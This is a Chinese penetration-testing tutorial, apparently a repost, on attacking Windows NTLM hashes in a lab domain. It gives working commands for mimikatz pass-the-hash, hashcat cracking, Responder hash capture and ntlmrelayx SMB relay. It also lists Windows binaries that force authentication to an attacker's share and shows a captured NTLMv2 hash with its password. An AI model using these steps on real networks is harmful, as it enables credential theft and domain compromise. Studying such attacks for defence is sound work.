内网渗透——针对hash的攻击

栏目: 数据库 · 发布时间: 5年前

内容简介:本文从hash获取方式,爆破hash,hash中转,中继等方面全面分析,以直观详细的实践来了解攻击过程,过程比较详细,请耐心观看。NTLM hash是windows登录密码的一种hash,可从Windows系统中的SAM文件和域控的NTDS.dit文件中获得所有用户的hash(比如用Mimikatz提取),获取该hash之后,可进行爆破明文、哈希传递(PtH攻击),

内网渗透——针对hash的攻击

0x01 前言

本文从hash获取方式,爆破hash,hash中转,中继等方面全面分析,以直观详细的实践来了解攻击过程,过程比较详细,请耐心观看。

0x02 什么是NTLM-hash、net NTLM-hash

NTLM hash是windows登录密码的一种hash,可从Windows系统中的SAM文件和域控的NTDS.dit文件中获得所有用户的hash(比如用Mimikatz提取),获取该hash之后,可进行爆破明文、哈希传递(PtH攻击),

Net-NTLM的hash是基于NTLM的hash值经过一定的算法产生的,获取Net-NTLM的hash之后,可进行爆破明文、利用smb进行中继攻击,该hash不能进行哈希传递攻击。

什么是NTLM hash?

NTLM hash的生成方法:

1、将明文口令转换成十六进制的格式

2、把十六进制转换成Unicode格式,每个字节之后添加0x00

3、再对Unicode字符串作MD4加密,生成32位的十六进制数字串

这里我通过mimikatz工具先直观的了解NTLM hash,mimikatz直接从 lsass.exe 里获取windows处于active状态账号明文密码,以windows server2012为例:

内网渗透——针对hash的攻击

从上图发现:

NTLM hash:A1E33A2281B8C6DBC2373BFF87E8CB6E

明文密码:123456Abc

0x03 对NTLM hash暴力破解

如果通过其它途径获得此hash,即A1E33A2281B8C6DBC2373BFF87E8CB6E,可用hashcat进行字典暴力破解,Hashcat参数如下:

hashcat64.exe -m 1000 A1E33A2281B8C6DBC2373BFF87E8CB6E example.dict -o out.txt —force

内网渗透——针对hash的攻击

参数说明:
-m 选择哈希类别,1000为NTLM
-o 输出破解成功的明文
example.dict 明文字典

打开out.txt,发现明文123456Abc

内网渗透——针对hash的攻击

注意:

由于windows server2012 r2、windwos 8.1以及更高版本都做了加固,即禁止明文缓存到内存,而mimikatz是基于内存获取明文密码,则无法直接通过mimikatz获取明文密码,直接提取结果为“null”,但可通过修改注册表来获取。

内网渗透——针对hash的攻击

参考

受保护用户 ( Protected Users )

http://www.bubuko.com/infodetail-2077149.html

0x04 NTLM哈希传递

哈希传递通俗来讲,就是不需要明文登录,用NTLM hash可直接进行登录。

在我们使用某服务时,Windows会带上自身的认证信息进行尝试登录,这个认证信息其实就是Net-NTLM的Hash,我们使用哪些服务会让Windows带上自身认证信息登录?如访问smb共享文件夹等,此时会使用认证信息尝试登录,并且调用lsass内存中的hash缓存尝试登录,此时使用mimikatz等 工具 修改缓存的hash为获取得到的hash,从而使用修改的hash进行登录,这是哈希传递的原理。文章后面讲到的获取Net-NTLM的hash,其实就是利用带认证信息访问smb,如让管理员访问此wdb: <img src="\192.168.191.129xx"> ,192.168.191.129被攻击者控制的一台内网PC,可获取管理员的Net-NTLM hash。

先讲下认证请求过程:

1、客户端先对在本地对密码加密成为密码散列
2、客户端发送认证请求,即发生明文账号
3、服务器返回一个16位的随机数字发送给客户端,作为一个 challenge
4、客户端再用步骤1的密码散列来加密这个 challenge ,作为 response返回给服务器。
5、服务器把用户名、给客户端的challenge 、客户端返回的 response ,发送域控制器
6、域控制器使用此用户名在SAM密码管理库的密码散列,加密给客户端的challenge
7、与步骤4客户端加密的challenge比较,如果两个challenge一致,认证成功

哈希传递漏洞发生在步骤4中,直接使用修改缓存后的hash,进行challenge加密,对challenge 加密的hash已经不是发送账号对应的hash,而是攻击者通过其他途径获取的hash进行challenge加密。

Pth攻击演示:

靶机ip:

内网渗透——针对hash的攻击

攻击机ip:

内网渗透——针对hash的攻击

假设已经获得NTLM hash:

内网渗透——针对hash的攻击

管理员身份运行mimikatz:

内网渗透——针对hash的攻击

mimikatz执行命令参数:

sekurlsa::pth /user:Ancert /domain:WIN-0HE0PTAL9L4 /ntlm:A1E33A2281B8C6DBC2373BFF87E8CB6E

此时再进行其它认证操作,可直接用获取的目标hash进行登录认证。

0x05 Net-NTLM hash获取

Net-NTLM hash不能直接获取,通过Responder工具进行拦截获取,此hash不能进行哈希传递,但可进行中继转发,利用Responder等中间人工具,结合其它工具可自动化进行拦截获取并中继转发,其它工具如 Impacket的ntlmrelayx.py进行中继转发。

在攻击机上运行Responder,此时攻击机模拟为SMB服务让受害者进行认证登录,通过设置几个模拟的恶意守护进程(如 SQL 服务器,FTP,HTTP和SMB服务器等)来直接提示凭据或模拟质询 – 响应验证过程并捕获客户端发送的必要 hash,当受害者机器尝试登陆攻击者机器,responder就可以获取受害者机器用户的NTLMv2哈希值。。

Responder下载安装:

https://github.com/lgandx/Responder

Responder操作演示

客户端IP:

内网渗透——针对hash的攻击

攻击机IP:

内网渗透——针对hash的攻击

1、 无需编辑Responder.conf,因为此时SMB、HTTP服务不要关闭,等中继攻击时才关闭这两个服务。因此这里先演示Responder怎么获取net-NTLM hash,在中继攻击里关闭SMB、HTTP,是因为此时不再由Responder获取hash,而是直接让ntlmrelayx.py来完成这一任务。

内网渗透——针对hash的攻击

2、 攻击机执行 python Responder.py -I eth0,此时处于监听状态

内网渗透——针对hash的攻击

3、 利用SMB协议,客户端在连接服务端时,默认先使用本机的用户名和密码hash尝试登录,所以可以模拟SMB服务器从而截获hash,执行如下命令都可以得到hash。

客户端执行如下命令,攻击机的Responder能收到。

> net.exe use \hostshare 
> attrib.exe \hostshare  
> bcdboot.exe \hostshare  
> bdeunlock.exe \hostshare  
> cacls.exe \hostshare  
> certreq.exe \hostshare #(noisy, pops an error dialog) 
> certutil.exe \hostshare  
> cipher.exe \hostshare  
> ClipUp.exe -l \hostshare  
> cmdl32.exe \hostshare  
> cmstp.exe /s \hostshare  
> colorcpl.exe \hostshare #(noisy, pops an error dialog)  
> comp.exe /N=0 \hostshare \hostshare  
> compact.exe \hostshare  
> control.exe \hostshare  
> convertvhd.exe -source \hostshare -destination \hostshare  
> Defrag.exe \hostshare  
> diskperf.exe \hostshare  
> dispdiag.exe -out \hostshare  
> doskey.exe /MACROFILE=\hostshare  
> esentutl.exe /k \hostshare  
> expand.exe \hostshare  
> extrac32.exe \hostshare  
> FileHistory.exe \hostshare #(noisy, pops a gui)  
> findstr.exe * \hostshare  
> fontview.exe \hostshare #(noisy, pops an error dialog)  
> fvenotify.exe \hostshare #(noisy, pops an access denied error)  
> FXSCOVER.exe \hostshare #(noisy, pops GUI)  
> hwrcomp.exe -check \hostshare  
> hwrreg.exe \hostshare  
> icacls.exe \hostshare   
> licensingdiag.exe -cab \hostshare  
> lodctr.exe \hostshare  
> lpksetup.exe /p \hostshare /s  
> makecab.exe \hostshare  
> msiexec.exe /update \hostshare /quiet  
> msinfo32.exe \hostshare #(noisy, pops a "cannot open" dialog)  
> mspaint.exe \hostshare #(noisy, invalid path to png error)  
> msra.exe /openfile \hostshare #(noisy, error)  
> mstsc.exe \hostshare #(noisy, error)  
> netcfg.exe -l \hostshare -c p -i foo

客户端执行 net use 192.168.191.131aaa

内网渗透——针对hash的攻击

4、 攻击机成功收到NTLMv2-SSP Hash

内网渗透——针对hash的攻击

Ancert::WIN-0HEOPTAL9L4:75c3bef66ef94f92:2424A1EA007E01413DD6653404BB7819:0101000000000000C0653150DE09D2018D964804B8A33ECB000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D201060004000200000008003000300000000000000001000000002000007AC21B7085961E257ABD8B489929693CDD3E37B624EC1AA3C62AE0F11516CBF80A001000000000000000000000000000000000000900280063006900660073002F003100390032002E003100360038002E003100390031002E00310033003100000000000000000000000000

爆破net-NTLM hash

继续用hashcat进行hash爆破,Hashcat参数如下:

hashcat64.exe -m 5600 Ancert::WIN-0HEOPTAL9L4:75c3bef66ef94f92:2424A1EA007E01413DD6653404BB7819:0101000000000000C0653150DE09D2018D964804B8A33ECB000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D201060004000200000008003000300000000000000001000000002000007AC21B7085961E257ABD8B489929693CDD3E37B624EC1AA3C62AE0F11516CBF80A001000000000000000000000000000000000000900280063006900660073002F003100390032002E003100360038002E003100390031002E00310033003100000000000000000000000000 example.dict -o out.txt --force

参数说明:

-m 选择哈希类别,5600为net-NTLM

成功破解出明文密码,如下图:

内网渗透——针对hash的攻击

打开out.txt,发现破解出明文123456Abc

内网渗透——针对hash的攻击

0x06 SMB中继攻击

前面文章说过了,当获取到net-NTLM hash之后,由于不能通过类似哈希传递的修改缓存hash进行认证,此hash无法进行哈希传递,怎么进行攻击呢?可通过Responder工具拦截管理员的net-NTLM hash,配合ntlmrelayx.py进行中继转发。

Impacket下载:

git clone https://github.com/CoreSecurity/impacket.git

进行中继前提:目标SMB签名需要关闭,在SMB连接中,需要使用安全机制来保护服务器和客户端之间传输数据的完整性,而这种安全机制就是SMB签名和加密,如果关闭SMB签名,会允许攻击者拦截认证过程,并且将获得hash在其他机器上进行重放,,从而获得域管权限。

目前SMB常用来做为SMB文件共享、打印机,如果签名关闭,可能导致文件共享、打印机被入侵。

比如我用虚拟机搭建的SMB文件共享如下,具体认证登录过程文章前面部分已讲过,看看这个效果:

虚拟机IP:192.168.191.139

内网渗透——针对hash的攻击

内网渗透——针对hash的攻击

内网渗透——针对hash的攻击

内网渗透——针对hash的攻击

先探测目标是否已关闭SMB签名,命令如下:

nmap --script smb-security-mode.nse -p445 192.168.191.139 --open

内网渗透——针对hash的攻击

如下是我用虚拟机搭建的域控环境测试,中继转发操作:

域内普通用户-受害者机器(win7)

内网渗透——针对hash的攻击

域管理员(administrator)机器(windows server 2012 r2)

内网渗透——针对hash的攻击

kali linux 攻击者机器

内网渗透——针对hash的攻击

1、Responder关闭SMB、HTTP

内网渗透——针对hash的攻击

2、执行python Responder.py -I eth0 -r -d –w

内网渗透——针对hash的攻击

3、执行 python ntlmrelayx.py -tf targets.txt -socks -smb2support

说明 :

targets.txt内容为域内受害IP 192.168.191.139

python ntlmrelayx.py -t 192.168.191.139 -socks -smb2support //

内网渗透——针对hash的攻击

4、域管模拟输入一个共享,生成一个LLMNR请求

内网渗透——针对hash的攻击

5、通过Responder发送

内网渗透——针对hash的攻击

6、NTLMv2哈希凭据被中继

内网渗透——针对hash的攻击

攻击流程总结:

1、关闭Responder的SMB和HTTP服务, 运行Responder工具来截取Net-NTLM哈希值

2、运行ntlmrelayx.py脚本,将Net-NTLM哈希值发送到ntlmrelayx.py脚本的SMB和HTTP服务

3、ntlmrelayx.py将hash发送到目标列表中,如果中继操作执行成功会触发通知命令。

这里先大概熟悉下中继转发的原理基础,在下一篇会结合DeathStar和Empire,演示自动化域渗透,以及对net NTLM-hash的利用。


以上所述就是小编给大家介绍的《内网渗透——针对hash的攻击》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

法律程序的意义:对中国法制建设的另一种思考

法律程序的意义:对中国法制建设的另一种思考

季卫东 / 中国法制出版社 / 2005-1 / 10.0

《法律程序的意义:对中国法制建设的另一种思考》内容为现代程序的概念与特征、现代程序的结构与功能、程序与现代社会、中国法律程序的缺陷、程序建设的程序等。一起来看看 《法律程序的意义:对中国法制建设的另一种思考》 这本书的介绍吧!

HEX CMYK 转换工具
HEX CMYK 转换工具

HEX CMYK 互转工具

HEX HSV 转换工具
HEX HSV 转换工具

HEX HSV 互换工具

HSV CMYK 转换工具
HSV CMYK 转换工具

HSV CMYK互换工具